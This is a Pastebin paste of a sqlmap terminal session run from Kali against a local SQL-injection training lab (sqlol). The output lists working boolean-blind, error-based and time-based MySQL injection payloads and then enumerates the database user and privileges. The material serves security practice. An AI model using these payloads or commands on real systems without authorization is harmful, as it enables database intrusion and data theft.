Advertisement
Guest User

triximap

a guest
Dec 15th, 2018
79
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.40 KB | None | 0 0
  1. root@kali:~# sqlmap -u "http://127.0.0.1/mcir/sqlol/challenges/challenge0.php" --wizard
  2. ___
  3. __H__
  4. ___ ___["]_____ ___ ___ {1.2.12.16#dev}
  5. |_ -| . [)] | .'| . |
  6. |___|_ ["]_|_|_|__,| _|
  7. |_|V |_| http://sqlmap.org
  8.  
  9. [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
  10.  
  11. [*] starting @ 14:22:15 /2018-12-15/
  12.  
  13. [14:22:15] [INFO] starting wizard interface
  14. POST data (--data) [Enter for None]:
  15. [14:22:23] [WARNING] no GET and/or POST parameter(s) found for testing (e.g. GET parameter 'id' in 'http://www.site.com/vuln.php?id=1'). Will search for forms
  16. Injection difficulty (--level/--risk). Please choose:
  17. [1] Normal (default)
  18. [2] Medium
  19. [3] Hard
  20. > 1
  21. Enumeration (--banner/--current-user/etc). Please choose:
  22. [1] Basic (default)
  23. [2] Intermediate
  24. [3] All
  25. > 1
  26.  
  27. sqlmap is running, please wait..
  28.  
  29. [#1] form:
  30. GET http://127.0.0.1/mcir/sqlol/select.php?query_results=all_rows&error_level=verbose&show_query=on&location=where_string&inject_string=&submit=Inject!
  31. do you want to test this form? [Y/n/q]
  32. > Y
  33. Edit GET data [default: query_results=all_rows&error_level=verbose&show_query=on&location=where_string&inject_string=&submit=Inject!]: query_results=all_rows&error_level=verbose&show_query=on&location=where_string&inject_string=&submit=Inject!
  34. do you want to fill blank fields with random values? [Y/n] Y
  35. it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
  36. for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
  37. GET parameter 'inject_string' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
  38. sqlmap identified the following injection point(s) with a total of 851 HTTP(s) requests:
  39. ---
  40. Parameter: inject_string (GET)
  41. Type: boolean-based blind
  42. Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
  43. Payload: query_results=all_rows&error_level=verbose&show_query=on&location=where_string&inject_string=PnBM' OR NOT 7863=7863#&submit=Inject!
  44.  
  45. Type: error-based
  46. Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
  47. Payload: query_results=all_rows&error_level=verbose&show_query=on&location=where_string&inject_string=PnBM' AND (SELECT 2442 FROM(SELECT COUNT(*),CONCAT(0x716a6a6b71,(SELECT (ELT(2442=2442,1))),0x717a7a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- RmtU&submit=Inject!
  48.  
  49. Type: AND/OR time-based blind
  50. Title: MySQL >= 5.0.12 OR time-based blind
  51. Payload: query_results=all_rows&error_level=verbose&show_query=on&location=where_string&inject_string=PnBM' OR SLEEP(5)-- NQku&submit=Inject!
  52. ---
  53. do you want to exploit this SQL injection? [Y/n] Y
  54. [14:23:27] [INFO] retrieved: 10.1.37-MariaDB-1
  55. web server operating system: Linux Debian
  56. web application technology: Apache 2.4.37
  57. back-end DBMS: MySQL >= 5.0
  58. banner: '10.1.37-MariaDB-1'
  59. [14:23:27] [INFO] retrieved: root@localhost
  60. current user: 'root@localhost'
  61. [14:23:27] [INFO] retrieved: sqlol
  62. current database: 'sqlol'
  63. current user is DBA: True
  64.  
  65. [*] ending @ 14:23:27 /2018-12-15/
  66.  
  67. root@kali:~#
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement